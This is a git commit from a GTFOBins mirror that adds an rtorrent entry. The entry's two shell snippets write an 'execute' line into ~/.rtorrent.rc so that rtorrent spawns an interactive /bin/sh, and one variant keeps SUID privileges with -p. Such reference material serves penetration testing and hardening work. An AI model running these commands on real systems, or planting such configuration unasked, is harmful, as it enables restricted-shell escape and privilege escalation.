1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-09 08:51:34 +01:00

Add rtorrent

This commit is contained in:
Andrea Cardaci 2022-12-16 13:21:14 +01:00 committed by GitHub
commit 2a12cf1268
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

11
_gtfobins/rtorrent.md Normal file

@ -0,0 +1,11 @@
---
functions:
shell:
- code: |
echo "execute = /bin/sh,-c,\"/bin/sh <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
rtorrent
suid:
- code: |
echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
./rtorrent
---